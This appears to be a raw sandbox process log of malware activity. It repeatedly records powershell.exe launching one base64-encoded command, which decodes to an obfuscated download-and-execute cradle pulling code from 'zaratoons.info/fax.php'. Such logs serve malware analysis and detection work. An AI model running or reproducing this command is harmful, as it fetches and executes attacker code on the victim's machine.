"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
141
5720
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
142
5736
powershell.exe
3104
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
143
5744
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
144
5752
powershell.exe
688
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
145
5776
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
146
5796
powershell.exe
2280
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
147
5820
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
148
5916
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
149
5996
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
150
6048
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
151
6108
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
152
6132
powershell.exe
3168
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
153
5244
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Created
Opened
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
154
4188
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
155
4216
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
156
5416
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
157
5476
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
158
4384
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
159
5708
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
160
4600
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
161
4744
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
162
6064
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
163
2812
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
164
4272
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
165
2116
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
166
6148
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
167
6172
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
168
6228
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
169
6292
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
170
6312
powershell.exe
2880
powershell.exe
